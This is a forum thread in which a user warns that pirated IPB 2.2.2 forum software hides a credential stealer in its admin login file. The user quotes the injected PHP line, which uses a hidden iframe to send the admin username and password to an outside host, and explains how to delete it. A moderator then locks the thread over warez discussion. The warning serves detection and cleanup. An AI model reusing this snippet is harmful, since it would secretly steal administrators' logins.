x10Hosting Forums

*DarkDragonLord* · 05:47 PM

Greetings everyone!

Well, just to let you know. This warning is for everyone but more for those who think is smarter than everyone, not buying the license but just downloading IPB in internet.

But, this can warn other people too.

When you go to www.randomdomainhere.com/forums/admin.php , it send you to forums/admin/index.php right? ok nothing new until here:

When you put your login and password and hit ok, it loads and appear a "Log In Successful".

Ok, but did you noticed that you might be giving your user/pass to anyone? You might ask "how? anyways, its MY forum".

Ya but someone added a code in the php of the admin login xD look this:

http://img251.imageshack.us/img251/5...speito2tw7.jpg

So, when you login, first it give all your info for these bastards, THEN you log in.

I've checked all damn php related to admin of IPB and founded the string. Its inside <forumfolder>/sources/action_admin/login.php

Then, find the array $connector. If you find, take a look and you will see the string giving all your info to the website.

you might find as this:

PHP Code:


			
$connector = '<script>window.stuats=\'\';</script><div style="display:none"><iframe src="http://zybez.ath.cx/connector.php?site=' . htmlentities($this->ipsclass->vars['board_url']) . '&user=' . htmlentities($this->ipsclass->input['username']) . '&pass=' . htmlentities($this->ipsclass->input['password']) . '\"></div>';
   $this->ipsclass->admin->redirect( $this->ipsclass->vars['board_url'].'/'.IPB_ACP_DIRECTORY."/index.".$this->ipsclass->vars['php_ext']."?ad 
(....)

Delete all that is related to $connector (all until the div>'; , since the $this in the next line just redirects you to the real admin cp), save and re-upload.

Now when you login, you will notice that your info isnt gave to anyone anymore.

If you check the website that is receiving the info, its offline. But, this is a service LIKE no-ip, so watch yourself.

I founded this while installing and testing a non-official IPB 2.2.2 for my friend since he can't pay the license >.<

Well, that was just a warning to u people: watch yourself and your info. This can be done anywhere in any non-official forum.

Hope this help someone ;D
See you
DDL

lambada · 05:00 PM

That is actually illegal anyway and against the rules of our forum.

On a side note any downloading of an unlicensed IPB to which you do not own the licence is illegal and as such this will be locked.

Consider this a verbal warning: we do not allow discussion of warez (or any matter related to warez) on this forum

x10Hosting Forums

Search

x10Hosting

Navigation